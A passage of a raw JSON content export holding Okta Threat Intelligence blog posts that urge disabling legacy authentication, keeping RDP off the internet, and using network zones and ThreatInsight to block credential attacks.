\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"measure of how often these services are targeted\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\". We can confidently say that there is a material reduction in risk available to organizations that disable legacy authentication: while the numbers vary by industry, we found that the average reduction in the ratio of detected threats to legitimate authentications exceeds 99%.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This reduction in risk is amplified when you add the protection multifactor authentication and risk-based access policies offer your users. \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://research.google/pubs/pub48119/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Academic studies\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" have demonstrated that risk-aware MFA blocks 99.9% of automated, credential-based attacks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"So if you’re looking to prioritise security projects proven to reduce the risk of compromise, this is an obvious one. Microsoft has (\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://redmondmag.com/articles/2021/02/04/microsoft-rethinks-plans-to-block-basic-auth.aspx\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"again\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\") set a new date for when it intends to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.bleepingcomputer.com/news/microsoft/microsoft-will-disable-basic-auth-in-exchange-online-in-october-2022/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"disable legacy authentication to Office 365\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\": October 1, 2022. Every customer of Microsoft cloud services should be assessing their exposure to legacy authentication over the weeks ahead. This requires making sure modern authentication is enabled \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"AND\",\"marks\":[{\"type\":\"bold\"},{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" that legacy authentication is disabled.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This post is the second in a three-part series. See our first post, \\\"\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2021/09/auditing-your-okta-org-legacy-authentication\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Auditing your Org for Legacy Authentication\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\\\"\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-11T20:59:41.448Z","secAuthor":[{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"Brett Winterford is Vice President of Okta Threat Intelligence. Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats. Brett was previously the regional Chief Security Officer for Okta in the Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank. Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"}]},{"slug":"/weneedtotalkaboutrdp","id":"17e5afad-c9d2-57df-81e3-7fe45fa3aefc","title":"We (still) need to talk about RDP","date":"2022-03-08T07:48:54+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Quarter by quarter, for three years now, abuse of Remote Desktop Protocol (RDP) has been the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.coveware.com/blog/2022/2/2/law-enforcement-pressure-forces-ransomware-groups-to-refine-tactics-in-q4-2021\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"most common root cause\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" of all ransomware events.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"It’s no surprise why RDP makes for an attractive target: RDP is the primary vehicle for remote access to Windows servers and is used for administrative functions. It’s the most \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://resources.digitalshadows.com/whitepapers-and-reports/initial-access-brokers-report\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"commonly listed method of remote access\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" sold by initial access brokers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"According to some \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-rdp-exposed-the-threats-thats-already-at-your-door-wp.pdf\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"2019 research [pdf]\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" by Sophos, an open RDP port gets its first connection request somewhere between 90 seconds and 15 hours of being exposed on the internet. Brute forcing RDP is so easy, the researchers noted, that “the criminal gangs who conduct targeted ransomware attacks have almost entirely abandoned alternative methods of network entry.”\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"“In recent years, criminals deploying targeted ransomware like BitPaymer, Ryuk, Matrix, and SamSam have almost completely abandoned other methods of network ingress in favor of using RDP. Gangs like these have the choice of cracking passwords themselves using tools like NLBrute, buying passwords cracked by others, or buying accounts on compromised RDP servers.”\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The situation hasn’t improved much since then. According to a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.cisa.gov/uscert/ncas/alerts/aa22-040a\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"joint statement\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" released by authorities in the US, UK and Australia in February, ransomware actors assumed that organizations rushing to provide remote access during the first COVID lockdowns would misconfigure RDP. And oh boy, \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://securelist.com/remote-spring-the-rise-of-rdp-bruteforce-attacks/96820/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"were they right\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All that said, I’ve never been 100% sure about whether there were systemic reasons that made RDP so prone to abuse. Surely, by now, after these hundreds of awareness campaigns and news articles, the collective hygiene practiced by systems administrators has improved to make this sort of abuse less effective?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Today there are a larger number of methods for discovering rogue servers and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/video/okta-advanced-server-access/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"locking down RDP\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", while the risks of leaving RDP unprotected have only increased. And yet we aren’t seeing a downward trend in the number of exposed endpoints (or compromised networks) stemming from abuse of RDP. I don’t want to give in to the temptation of just putting it down to “lazy admins” and “miserly CIOs”. There has to be more to it.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"1ksAT1R3oFnjWb3u5yAQ7p\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Source: Shodan.io\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"By a “systemic” reason, I mean a set of conditions that lead to poor security outcomes, as opposed to a specific vulnerability. A systemic reason might be insecure defaults, for example, or indecipherable documentation. It might be essential security tasks that require additional “premium” licenses or for settings to be configured in multiple admin consoles. It’s often a combination of those things.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Recently a few observations made it all click for me.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The first came courtesy of a former Microsoft security engineer dropping a truth-bomb on Twitter. RDP is usually abused using \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://twitter.com/gossithedog/status/1490744610469076998?s=21\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"brute force attacks\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", he noted, because there aren’t any out-of-the-box ways to apply rate limiting to RDP.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"“An entire and large part of the ransomware economy is this singular issue.”\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"And just as I was getting my head around how Microsoft would go about applying rate limiting in a server OS (it’s not trivial), my former colleagues at the Risky Business podcast published a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://risky.biz/HF15/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"groundbreaking interview\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" with Michael Montaya, CISO of Equinix. Montaya rather bravely gave Risky Business a blow-by-blow account of a ransomware incident at the company. The beachhead for the attack was a brute force attack on an unsanctioned server with RDP exposed to the internet.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"“The configurations that come out of the box in the cloud don’t always follow best practices,” Montaya explained.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If you combine the constrained ability of security teams to discover open RDP ports in unsanctioned infrastructure, and the unconstrained ability for attackers to test stolen credentials against clients with RDP exposed, it starts to take the shape of a systemic problem.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If you \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.shodan.io/search?query=port%3A3389+%22administrator%22\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"glance at where you find the most Windows servers\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" with RDP open to the internet, it doesn’t marry closely with market share. There seems to be disproportionately more vulnerable servers hosted by managed service providers that rent access to Windows VMs as a “cloud service”. The default settings at these service providers is worthy of analysis.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In this context, it’s just a little tiresome to keep chalking up abuse of RDP to “poor user credential hygiene”. That’s the sort of cop out that’s enabled initial access brokers and ransomware affiliates to thrive for the five years. Our services should, at some level, be configured to anticipate and expect that users will practice poor credential hygiene. At the very least, service providers should offer VMs with inbound connections over RDP blocked by default.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Keep beating that drum\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Given the known conditions that make RDP so vulnerable, we unfortunately need to keep hammering home the message that admins avoid exposing RDP to the internet in the first place - even if a lot of people are sick of hearing about it.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Inbound connections via RDP should be limited to trusted network sources and protected by multifactor authentication. In a true “zero trust” context, that means MFA is applied even when the admin is already on the network. Better yet, the only trusted source should be a jump host/bastion host that admins must authenticate to first. All authentication via RDP should be \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://ponderthebits.com/2018/02/windows-rdp-related-event-logs-identification-tracking-and-investigation/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"logged and monitored\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for large numbers of unsuccessful logins.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If remote access is absolutely required, an admin should first have to authenticate via a gateway. Bonus points if the solution involves “just in time” access - that is, ephemeral credentials for every session.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These controls aren’t so difficult to implement, but they can be difficult to sell into IT admins that complain loudly about the slightest inconvenience.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In infosec we expend a lot of time and investment in mitigating numerous “theoretical” risks. It’s disappointing that something as commonplace as the abuse of RDP isn’t flashy enough to warrant more energy.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"So “once more unto the breach”, my infosec friends, there are better ways to secure remote access.\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-11T20:59:00.307Z","secAuthor":[{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"Brett Winterford is Vice President of Okta Threat Intelligence. Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats. Brett was previously the regional Chief Security Officer for Okta in the Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank. Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"}]},{"slug":"/articles/2022/03/protection-without-perimeters","id":"f494a463-6f7c-5d76-96d1-1b2f478a57f1","title":"Protection, without perimeters","date":"2022-03-14T00:47:12+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Given the premise that “identity is the new perimeter”, we’re often asked about the role network attributes should play in restricting access to applications, servers and data.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Can we, and should we, for example, deny access requests originating in high-risk countries or countries involved in conflict?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The reality is that network context still matters. We can take into account the identity of the network and location our users are authenticating from. If a customer determines that there are no authorized users in a region or country, a least privilege approach might warrant a decision to not allow networks from that region to connect to its applications and data.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The network source of an access request is one of the many attributes that can be dynamically evaluated prior to or during authentication as part of “Zero Trust” approach to security.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In Okta, the building blocks of this assessment are what we call \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en/prod/Content/Topics/Security/Security_Network.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Network Zones\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"1czREiHfXmY6LFeVrvLIZE\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Engine - for illustrative purposes only\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Administrators can configure a network zone by IP (or IP range), which is useful when allowlisting trusted network locations, for example, or denying requests from IPs known to be untrustworthy.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en/prod/Content/Topics/Security/network/create-dynamic-zone.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Dynamic Zones\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" go one step further. These zones are based on a dynamic evaluation of IP attributes, such as what country, organization, or Autonomous System Number (ASN) / Internet Service Provider (ISP) is associated with an IP, whether the IP is associated with known proxies such as TOR, or whether those proxies attempt to anonymize the true source of the request.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Network zones can be taken into account prior to authentication, during authentication, or at any other time the security context of a session is re-evaluated.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Pre-authentication\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Network attributes can first be evaluated during pre-authentication: that is, when a user attempts to load an Okta sign-in page in their browser. Administrators can configure a network zone to limit access to their sign-in page to the trusted locations they expect users to sign-in from.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"During authentication\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An organization might choose to block access requests from anonymizing proxies, or from ASNs with a poor reputation, or from high-risk countries where they don’t expect to have any legitimate users at pre-authentication. But this approach is less ideal when you need to provision access by exception - such as to a handful of legitimate users in a country or from an ASN where you ordinarily wouldn’t conduct business.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"You might, for example, have a small set of known users with a legitimate reason to authenticate from a country that you would otherwise be considered risky. In these circumstances, network zones can be evaluated \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"during\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" authentication.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An administrator might, for example, require that users authenticating from a specific network zone(s) meet an additional set of security requirements than those authenticating from a trusted network.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"4swlqRJD34OqT5GHXmBs2B\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Engine - for illustrative purposes only\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta allows for these use-cases to be managed through group membership or user and device attributes. Policies can then require these users to present higher assurance factors (such as those that are device bound, hardware protected, or otherwise phishing resistant). Or they might be limited to only authenticating from a known, registered or managed device, and/or from a device that exhibits specific device posture.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators may also take an “adaptive” approach - applying a differentiated set of access conditions based on an evaluation of risk. How risk scores are calculated varies by organization: Okta’s \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/risk-events/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Risk Events API\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" allows admins to factor in risk scores derived from external signals, such as their third-party security partners. “Out of the box” scores are determined by evaluation of both network reputation and any \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en/prod/Content/Topics/Security/proc-security-behavior-detection.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"changes in user or device behavior\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (new device, new location, new IP, impossible travel, or other factors).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators can use this breadth of policy and authenticator options to develop “zero trust” access policies from a single control plane. A zero trust approach to security requires a “trust, but verify” approach around any single attribute.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What does that mean in practice?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We should anticipate a small number of users will choose common passwords and re-use them. Okta allows admins to deny common passwords and apply strong password policies.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We should anticipate that even strong passwords will be reused and occasionally stolen. Use of rate limiting controls on authentication endpoints and allows admins to protect accounts using multifactor authentication.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We should anticipate attackers will attempt to anonymize or spoof their location. Okta provides admins a broad mix of complementary attributes to assess in access policies: everything from behavior detection to device context, high assurance factors and integrations with third party security providers.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While typically network zones are configured in the Okta administration console, they can also be programmatically managed using Okta’s \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/zones/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Zones API\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". The API provides the ability to poll, create and update network zones. This comes in handy when updating larger sets of IPs across multiple network zones using intelligence gleaned from outside Okta.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Modern internet infrastructure is highly ephemeral, with many IP addresses being rapidly assigned and reassigned to users and devices. Because of this, determining the reputation of any given IP is relatively dynamic and highly contextual. Okta will only block an IP address globally where malicious intent can be inferred with high confidence. We strongly recommend organizations complement it with their own blocklists.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This shapeshifting environment requires a defensive approach that can rapidly assign reputation to an IP as soon as it is observed in attacks. That’s where Okta’s ThreatInsight – and machine learning more generally – can play a role.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ThreatInsight\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en/prod/Content/Topics/Security/threat-insight/about-threatinsight.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"ThreatInsight\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" is a default security capability available to every Okta customer that is designed to detect and block high-volume credential-based attacks that target Okta endpoints.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ThreatInsight uses heuristics and machine learning to recognise common password spraying, credential stuffing and similar brute-force attacks. Importantly, it harnesses the network effect of the many millions of authentication requests made to thousands of Okta orgs on any given day to provide currency to the reputation of any given IP.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The capability offers a security baseline for all Okta customers, with minimal configuration required. An Okta admin simply selects enforce mode in the Okta Admin Console to automatically deny requests identified as malicious at pre-authentication, or audit mode to tag the malicious request with a higher risk score during authentication or to generate alerts in your SIEM/SOAR.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security is a Team Sport\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Okta Identity Cloud can assess all of this context from one control plane and intuitive administration console. But we also view zero trust security as a “team sport”. Okta deliberately constrains our assessment of IP reputation to behaviors observed across the Okta Identity Cloud and the intelligence we consume from trusted partners.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Your security and threat teams have a much better understanding of your cloud and data usage patterns, including your use of Okta. The \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/risk-events/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Risk Events API\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" offers an ability for administrators to ingest signals from other sources of risk data: such as network service providers with broader visibility, partners that assess risk across an entire Content Delivery Network, specialist providers of bot management services, or data collected by customers themselves. These can augment native Okta capabilities and give customers a larger set of data from which to evaluate the risk of any given request.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This open and neutral approach and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2021/04/oktane21-introducing-oktas-new-risk-ecosystem-api-a-fraud-fighting-toolset\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"partnerships\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" with other best-of-breed providers offers the best opportunity for you to provide users with frictionless access to applications and data using a least privilege model across both user and network identities.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chris Niggel contributed to this article\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-11T20:52:26.059Z","secAuthor":[{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"Brett Winterford is Vice President of Okta Threat Intelligence. Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats. Brett was previously the regional Chief Security Officer for Okta in the Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank. Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.
